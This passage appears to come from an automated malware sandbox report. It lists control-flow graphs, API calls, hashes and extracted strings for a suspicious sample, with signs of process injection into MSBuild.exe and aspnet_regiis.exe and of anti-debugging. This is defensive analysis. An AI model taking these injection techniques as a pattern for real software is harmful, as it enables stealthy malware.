6cdc4810 11650->11659 11652->11643 11656 6cdc1057 11653->11656 11654 6cdd1380 _ValidateLocalCookies 5 API calls 11655 6cdc13ca 11654->11655 11655->11579 11656->11654 11658 6cdc22d9 GetModuleHandleA 11657->11658 11658->11628 11660 6cdc483e 11659->11660 11661 6cdd1380 _ValidateLocalCookies 5 API calls 11660->11661 11662 6cdc6816 11661->11662 11662->11652 11663 6cdd6a72 11664 6cdd6a7f 11663->11664 11665 6cdd47d6 _free 14 API calls 11664->11665 11666 6cdd6a99 11665->11666 11667 6cdd4833 _free 14 API calls 11666->11667 11668 6cdd6aa5 11667->11668 11669 6cdd47d6 _free 14 API calls 11668->11669 11672 6cdd6acb 11668->11672 11671 6cdd6abf 11669->11671 11673 6cdd4833 _free 14 API calls 11671->11673 11674 6cdd6ad7 11672->11674 11675 6cdd6004 11672->11675 11673->11672 11676 6cdd5e21 _free 5 API calls 11675->11676 11677 6cdd6020 11676->11677 11678 6cdd603e InitializeCriticalSectionAndSpinCount 11677->11678 11679 6cdd6029 11677->11679 11678->11679 11679->11672
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$Memory$Write$Thread$CloseContextHandle$AllocateCreate$ReadWindow$AllocConsoleProcessResumeShow
                                                                                            • String ID: ?i~$@$@al|$@al|$BO$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$J*W!$MZx$RFk|$]4$$]4$$gN@,$kernel32.dll$ntdll.dll$pie$$z4XD$z4XD$Pi$}|K
                                                                                            • API String ID: 2249330402-1764667461
                                                                                            • Opcode ID: eb0e45915b0ff5f6fff4dfa6c794446b836855d9d5f2f661b1a7dc0a22952846
                                                                                            • Instruction ID: 239ca19db06a986679822aadbfb17ae6c6636a52b5a25206fad66c3383cf0776
                                                                                            • Opcode Fuzzy Hash: eb0e45915b0ff5f6fff4dfa6c794446b836855d9d5f2f661b1a7dc0a22952846
                                                                                            • Instruction Fuzzy Hash: 27E32572B402158FCB18CF3CC9947C977F2AB8A364F114299D569DBBB4C73A9A498F01
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$File$Close$Module$Create$CurrentMappingProcessProtectViewVirtual$InformationName
                                                                                            • String ID: "k$$'Ddg$@$Hc$$Hc$$g[8'$g[8'$SS$SS
                                                                                            • API String ID: 2758125660-1003079120
                                                                                            • Opcode ID: 9958d8e95a9ddba8f5139d3717b753fe5158cf3ecca60028d1eb6846bf42ff21
                                                                                            • Instruction ID: 393d85d2ca02f0be93e7a0c36a298993569d0572451f82fb9cf79a5d07349bc0
                                                                                            • Opcode Fuzzy Hash: 9958d8e95a9ddba8f5139d3717b753fe5158cf3ecca60028d1eb6846bf42ff21
                                                                                            • Instruction Fuzzy Hash: 2143F176B442118FCB08CF3CCAD53D97BF6AF46314F109259D859EBBA5C73A89498B02
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?), ref: 6CDC7356
                                                                                            • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?), ref: 6CDC811D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID: NtQueryInformationProcess$Pq$es.Y$es.Y$ntdll.dll$zO+f$zO+f
                                                                                            • API String ID: 4139908857-2659222355
                                                                                            • Opcode ID: beb40e29cde4a0f0d5191bdac464ba89c5e22fa78e53449d5be29a1eaaac20f5
                                                                                            • Instruction ID: 23e57ea037a4e31b346f7155422776c6304104193441f9fdd0c3df3bcaf9d5df
                                                                                            • Opcode Fuzzy Hash: beb40e29cde4a0f0d5191bdac464ba89c5e22fa78e53449d5be29a1eaaac20f5
                                                                                            • Instruction Fuzzy Hash: 98C22576B506018FDF04CF7CCA957DE7BF6EB46324F20952AD415C7BA5C22A990B8B02

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1760 6cdd14e8-6cdd14fb call 6cdd1d50 1763 6cdd14fd-6cdd14ff 1760->1763 1764 6cdd1501-6cdd1523 call 6cdd1930 1760->1764 1765 6cdd156a-6cdd1579 1763->1765 1768 6cdd1525-6cdd1568 call 6cdd19fb call 6cdd18b7 call 6cdd1d19 call 6cdd157d call 6cdd1b9c call 6cdd158a 1764->1768 1769 6cdd1590-6cdd15a9 call 6cdd1bca call 6cdd1d50 1764->1769 1768->1765 1780 6cdd15ab-6cdd15b1 1769->1780 1781 6cdd15ba-6cdd15c1 1769->1781 1780->1781 1783 6cdd15b3-6cdd15b5 1780->1783 1784 6cdd15cd-6cdd15e1 dllmain_raw 1781->1784 1785 6cdd15c3-6cdd15c6 1781->1785 1787 6cdd1693-6cdd16a2 1783->1787 1790 6cdd168a-6cdd1691 1784->1790 1791 6cdd15e7-6cdd15f8 dllmain_crt_dispatch 1784->1791 1785->1784 1788 6cdd15c8-6cdd15cb 1785->1788 1792 6cdd15fe-6cdd1610 call 6cdd0660 1788->1792 1790->1787 1791->1790 1791->1792 1799 6cdd1639-6cdd163b 1792->1799 1800 6cdd1612-6cdd1614 1792->1800 1801 6cdd163d-6cdd1640 1799->1801 1802 6cdd1642-6cdd1653 dllmain_crt_dispatch 1799->1802 1800->1799 1803 6cdd1616-6cdd1634 call 6cdd0660 call 6cdd14e8 dllmain_raw 1800->1803 1801->1790 1801->1802 1802->1790 1804 6cdd1655-6cdd1687 dllmain_raw 1802->1804 1803->1799 1804->1790
                                                                                            APIs
                                                                                            • __RTC_Initialize.LIBCMT ref: 6CDD152F
                                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 6CDD1549
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize___scrt_uninitialize_crt
                                                                                            • String ID:
                                                                                            • API String ID: 2442719207-0
                                                                                            • Opcode ID: a28104bef8e5bdaa4bb2da47ff5f7daabc75e48ed01f918be4143be3e981f53c
                                                                                            • Instruction ID: d96413ed922cb8e624d1359c30d9d5fa6e42e4ec75738bea79977beea6e8c250
                                                                                            • Opcode Fuzzy Hash: a28104bef8e5bdaa4bb2da47ff5f7daabc75e48ed01f918be4143be3e981f53c
                                                                                            • Instruction Fuzzy Hash: 3B41D572E04214EFDB108FA5C800BAE7BB5EB85B78F174219F81557A70C735E9058BB0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1810 6cdd1598-6cdd15a9 call 6cdd1d50 1813 6cdd15ab-6cdd15b1 1810->1813 1814 6cdd15ba-6cdd15c1 1810->1814 1813->1814 1815 6cdd15b3-6cdd15b5 1813->1815 1816 6cdd15cd-6cdd15e1 dllmain_raw 1814->1816 1817 6cdd15c3-6cdd15c6 1814->1817 1818 6cdd1693-6cdd16a2 1815->1818 1820 6cdd168a-6cdd1691 1816->1820 1821 6cdd15e7-6cdd15f8 dllmain_crt_dispatch 1816->1821 1817->1816 1819 6cdd15c8-6cdd15cb 1817->1819 1822 6cdd15fe-6cdd1610 call 6cdd0660 1819->1822 1820->1818 1821->1820 1821->1822 1825 6cdd1639-6cdd163b 1822->1825 1826 6cdd1612-6cdd1614 1822->1826 1827 6cdd163d-6cdd1640 1825->1827 1828 6cdd1642-6cdd1653 dllmain_crt_dispatch 1825->1828 1826->1825 1829 6cdd1616-6cdd1634 call 6cdd0660 call 6cdd14e8 dllmain_raw 1826->1829 1827->1820 1827->1828 1828->1820 1830 6cdd1655-6cdd1687 dllmain_raw 1828->1830 1829->1825 1830->1820
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                            • String ID:
                                                                                            • API String ID: 3136044242-0
                                                                                            • Opcode ID: 5054044b36e81d6bc587166a2c60daf04c48c58fdc9e56b5a537a0cf7f2429ed
                                                                                            • Instruction ID: b431541eb6a1128684e2387e58ff444799fb9bf6890892ccfa4563a77c6bface
                                                                                            • Opcode Fuzzy Hash: 5054044b36e81d6bc587166a2c60daf04c48c58fdc9e56b5a537a0cf7f2429ed
                                                                                            • Instruction Fuzzy Hash: 78214F71E01659EBDB214F55C840AAF3A79EB81BB8F1B4229F81557A70C335ED058BE0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1836 6cdd6a72-6cdd6a7d 1837 6cdd6a7f-6cdd6a84 1836->1837 1838 6cdd6a86-6cdd6a88 1836->1838 1839 6cdd6a8c 1837->1839 1840 6cdd6a8a 1838->1840 1841 6cdd6a91-6cdd6a94 call 6cdd47d6 1838->1841 1839->1841 1840->1839 1843 6cdd6a99-6cdd6aaf call 6cdd4833 1841->1843 1846 6cdd6adc-6cdd6adf 1843->1846 1847 6cdd6ab1-6cdd6ad5 call 6cdd47d6 call 6cdd4833 1843->1847 1848 6cdd6ae4-6cdd6b17 call 6cdd6004 1846->1848 1847->1846 1859 6cdd6ad7-6cdd6adb 1847->1859 1854 6cdd6b19-6cdd6b1c 1848->1854 1855 6cdd6b22 1848->1855 1854->1855 1857 6cdd6b1e-6cdd6b20 1854->1857 1858 6cdd6b29-6cdd6b33 1855->1858 1857->1855 1857->1858 1858->1848 1860 6cdd6b35-6cdd6b39 1858->1860
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID: Hl
                                                                                            • API String ID: 269201875-1007200271
                                                                                            • Opcode ID: 980a3e9c64ce7fbb7847b6ee4f016225fe348e72d9cc32c19cdbcd0a90db473b
                                                                                            • Instruction ID: b9cb16e11d076b13a429d357fdac3899bb6426db9d4cbbaaa5ce731877db0e4d
                                                                                            • Opcode Fuzzy Hash: 980a3e9c64ce7fbb7847b6ee4f016225fe348e72d9cc32c19cdbcd0a90db473b
                                                                                            • Instruction Fuzzy Hash: 171193B1F402209BDF209F2D9D41B4937B4A746724F1A1A16E965CBEE0EB7CE84647D0

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1861 6cdd13e1-6cdd13f7 call 6cdd1d50 call 6cdd1a2b 1866 6cdd13fd-6cdd1415 call 6cdd1930 1861->1866 1867 6cdd14ce 1861->1867 1871 6cdd141b-6cdd142c call 6cdd198d 1866->1871 1872 6cdd14e0-6cdd14e7 call 6cdd1bca 1866->1872 1869 6cdd14d0-6cdd14df 1867->1869 1877 6cdd142e-6cdd1447 call 6cdd1ced call 6cdd18ab call 6cdd18cf call 6cdd3014 1871->1877 1878 6cdd147b-6cdd1489 call 6cdd14c4 1871->1878 1895 6cdd144c-6cdd1450 1877->1895 1878->1867 1883 6cdd148b-6cdd1495 call 6cdd1bc4 1878->1883 1889 6cdd1497-6cdd14a0 call 6cdd1aeb 1883->1889 1890 6cdd14b6-6cdd14bf 1883->1890 1889->1890 1896 6cdd14a2-6cdd14b4 1889->1896 1890->1869 1895->1878 1897 6cdd1452-6cdd1459 call 6cdd1962 1895->1897 1896->1890 1897->1878 1901 6cdd145b-6cdd1478 call 6cdd2fcf 1897->1901 1901->1878
                                                                                            APIs
                                                                                            • __RTC_Initialize.LIBCMT ref: 6CDD142E
                                                                                              • Part of subcall function 6CDD18AB: InitializeSListHead.KERNEL32(6CE2F388,6CDD1438,6CDE10D8,00000010,6CDD13C9,?,?,?,6CDD15F1,?,00000001,?,?,00000001,?,6CDE1120), ref: 6CDD18B0
                                                                                            • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CDD1498
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                            • String ID:
                                                                                            • API String ID: 3231365870-0
                                                                                            • Opcode ID: 440ea18e7d999af0752cde1d34e5a38517d27f08ad868e0ce78ac14e7fd0e546
                                                                                            • Instruction ID: 442d96ae4fb9894ca096215c2ace771fbb8caba2f6d3b00b0a397c4ab161ad0e
                                                                                            • Opcode Fuzzy Hash: 440ea18e7d999af0752cde1d34e5a38517d27f08ad868e0ce78ac14e7fd0e546
                                                                                            • Instruction Fuzzy Hash: 6321CD32E492109AEB00ABB488047D977B1EF4627EF12051AE49227AF2CB35B04CC3B1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1904 6cdd620f-6cdd6214 1905 6cdd6216-6cdd622e 1904->1905 1906 6cdd623c-6cdd6245 1905->1906 1907 6cdd6230-6cdd6234 1905->1907 1909 6cdd6257 1906->1909 1910 6cdd6247-6cdd624a 1906->1910 1907->1906 1908 6cdd6236-6cdd623a 1907->1908 1912 6cdd62b5-6cdd62b9 1908->1912 1911 6cdd6259-6cdd6266 GetStdHandle 1909->1911 1913 6cdd624c-6cdd6251 1910->1913 1914 6cdd6253-6cdd6255 1910->1914 1915 6cdd6268-6cdd626a 1911->1915 1916 6cdd6275 1911->1916 1912->1905 1917 6cdd62bf-6cdd62c2 1912->1917 1913->1911 1914->1911 1915->1916 1918 6cdd626c-6cdd6273 GetFileType 1915->1918 1919 6cdd6277-6cdd6279 1916->1919 1918->1919 1920 6cdd627b-6cdd6284 1919->1920 1921 6cdd6297-6cdd62a9 1919->1921 1922 6cdd628c-6cdd628f 1920->1922 1923 6cdd6286-6cdd628a 1920->1923 1921->1912 1924 6cdd62ab-6cdd62ae 1921->1924 1922->1912 1925 6cdd6291-6cdd6295 1922->1925 1923->1912 1924->1912 1925->1912
                                                                                            APIs
                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 6CDD625B
                                                                                            • GetFileType.KERNELBASE(00000000), ref: 6CDD626D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileHandleType
                                                                                            • String ID:
                                                                                            • API String ID: 3000768030-0
                                                                                            • Opcode ID: 5f6588d32b2d399cf07b824049deccc9162b4947a64e0cee8ce16954e31d9f8d
                                                                                            • Instruction ID: bffdcb5306efddcb773060538d9d427f116f4c22f59d3e029617af5063a1d310
                                                                                            • Opcode Fuzzy Hash: 5f6588d32b2d399cf07b824049deccc9162b4947a64e0cee8ce16954e31d9f8d
                                                                                            • Instruction Fuzzy Hash: 96118E71A047518ADB204F3E888479BBEA4AB97238B360F1AD5B7D69F1D724F44387C1

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1926 6cdd47d6-6cdd47e1 1927 6cdd47ef-6cdd47f5 1926->1927 1928 6cdd47e3-6cdd47ed 1926->1928 1930 6cdd480e-6cdd481f RtlAllocateHeap 1927->1930 1931 6cdd47f7-6cdd47f8 1927->1931 1928->1927 1929 6cdd4823-6cdd482e call 6cdd47c3 1928->1929 1936 6cdd4830-6cdd4832 1929->1936 1932 6cdd47fa-6cdd4801 call 6cdd7237 1930->1932 1933 6cdd4821 1930->1933 1931->1930 1932->1929 1939 6cdd4803-6cdd480c call 6cdd63f7 1932->1939 1933->1936 1939->1929 1939->1930
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CDD43D9,00000001,00000364,00000013,000000FF,?,00000001,6CDD47C8,6CDD4859,?,?,6CDD3A6F), ref: 6CDD4817
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
                                                                                            • Opcode ID: 81d668161ccff7dbcbdb486b28db13431ee8274dae77ae3c47dbfbad3280c771
                                                                                            • Instruction ID: c61699574688debf34143e367e57422d42bbee7c5248e0f0fba81013ea2b5819
                                                                                            • Opcode Fuzzy Hash: 81d668161ccff7dbcbdb486b28db13431ee8274dae77ae3c47dbfbad3280c771
                                                                                            • Instruction Fuzzy Hash: 5EF0B432E452A4B7EB111B769C44F9BB758DF427F4B174221E814DAAA4CB30F44487E0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6cdc0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: :W$:W$=#t$=#t$C'=$C'=$H2B$H2B$\Lf$\Lf$`/J$i/C7$iWa|
                                                                                            • API String ID: 0-3696831155
                                                                                            • Opcode ID: f31a3b6468ee572e9b3afab34ed6163d3f1f40f668211612bc3ae624c4f756a8
                                                                                            • Instruction ID: 5c1238d09aa07a0232a556a0b6e0366bf932d86834dc61517bc4c3cc4c78a149
                                                                                            • Opcode Fuzzy Hash: f31a3b6468ee572e9b3afab34ed6163d3f1f40f668211612bc3ae624c4f756a8
                                                                                            • Instruction Fuzzy Hash: 45130F72B44215CFDF048F6CC8D17ED7BF6BB46314F208619D855DBBA4CA3A890A9B12

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 2389 54ac10-54ac74 2390 54ac80-54acdb 2389->2390 2390->2390 2391 54acdd-54acf9 2390->2391 2393 54ad06-54ad54 2391->2393 2394 54acfb 2391->2394 2396 54b196-54b1bb call 551790 2393->2396 2397 54ad5a-54ad9b 2393->2397 2394->2393 2404 54b1c5-54b1c7 2396->2404 2405 54b1bd-54b1c1 2396->2405 2398 54ada0-54addc 2397->2398 2398->2398 2400 54adde-54ae09 2398->2400 2410 54b185-54b192 2400->2410 2411 54ae0f-54ae29 2400->2411 2406 54b1df-54b1e6 2404->2406 2405->2404 2408 54b1f2-54b23f call 531b40 2406->2408 2409 54b1e8-54b1ef 2406->2409 2416 54b240-54b24b 2408->2416 2409->2408 2410->2396 2417 54ae2f-54ae48 2411->2417 2418 54b17b-54b181 2411->2418 2416->2416 2419 54b24d-54b259 2416->2419 2420 54ae50-54ae8d 2417->2420 2418->2410 2421 54b1d0-54b1d9 2419->2421 2422 54b25f-54b26f call 51a640 2419->2422 2420->2420 2423 54ae8f-54af15 2420->2423 2421->2406 2424 54b274-54b27b 2421->2424 2422->2421 2428 54af20-54af52 2423->2428 2428->2428 2429 54af54-54af79 2428->2429 2432 54b165-54b177 2429->2432 2433 54af7f-54afa1 2429->2433 2432->2418 2436 54afa7-54afaa 2433->2436 2437 54b15b-54b161 2433->2437 2436->2437 2439 54afb0-54afb5 2436->2439 2437->2432 2439->2437 2440 54afbb-54b011 2439->2440 2442 54b020-54b05c 2440->2442 2442->2442 2443 54b05e-54b079 2442->2443 2445 54b143-54b154 2443->2445 2446 54b07f-54b085 2443->2446 2445->2437 2446->2445 2447 54b08b-54b098 2446->2447 2448 54b0dd 2447->2448 2449 54b09a-54b09f 2447->2449 2452 54b0df-54b106 call 51a5c0 call 540e80 2448->2452 2451 54b0bc-54b0c0 2449->2451 2453 54b0b0 2451->2453 2454 54b0c2-54b0cb 2451->2454 2464 54b10d-54b11d 2452->2464 2465 54b108 2452->2465 2458 54b0b1-54b0ba 2453->2458 2459 54b0d2-54b0d6 2454->2459 2460 54b0cd-54b0d0 2454->2460 2458->2451 2458->2452 2459->2458 2462 54b0d8-54b0db 2459->2462 2460->2458 2462->2458 2466 54b124-54b140 call 51a5f0 call 51a5d0 2464->2466 2467 54b11f 2464->2467 2465->2464 2466->2445 2467->2466
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: !_2Y$"S#M$9]j]$;OnI$C$I'Y!$T#]]$\$q]j]$tW(Q$tw$x[
                                                                                            • API String ID: 0-621965088
                                                                                            • Opcode ID: 6867a64c209b8ec419b575e2f86c161e36324c351d94c4c156dac538c8b104a7
                                                                                            • Instruction ID: 0077388605917baf37841a36464fcb721e77fd7d82598e2c918f1312e32a8e91
                                                                                            • Opcode Fuzzy Hash: 6867a64c209b8ec419b575e2f86c161e36324c351d94c4c156dac538c8b104a7
                                                                                            • Instruction Fuzzy Hash: 6EF1FC72A083019BE310DF64CC95B9BBBE5FBC5718F148A2CF5959B290D374D905CB82
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1997247009.00000000004F2000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1997229499.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1997305150.0000000000580000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_4f0000_S#U043eftWare.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: *1#)$6$8<*>$9%;<$?=!<$N@FN$Y]W]$hVkg
                                                                                            • API String ID: 0-3617423471
                                                                                            • Opcode ID: 83c991cffa6e60ea07d5c839a1e663d600b50350f74ad5ff60149fd351f06f3c
                                                                                            • Instruction ID: 35a27d92b954acafabe62af6f28e07d6b83d883c88f0e45be9475647eadde731
                                                                                            • Opcode Fuzzy Hash: 83c991cffa6e60ea07d5c839a1e663d600b50350f74ad5ff60149fd351f06f3c
                                                                                            • Instruction Fuzzy Hash: 98D13D716087914BE729CF29C8503ABBFE1AFD7314F0885ADD4D59B392CB398846C792
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1999593272.000000006CDC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CDC0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1999579232.000000006CDC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999616065.000000006CDDC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999631815.000000006CDE2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1999678394.000000006CE30000.00000002.00000001.01000000.00000007.sdmpDownload File
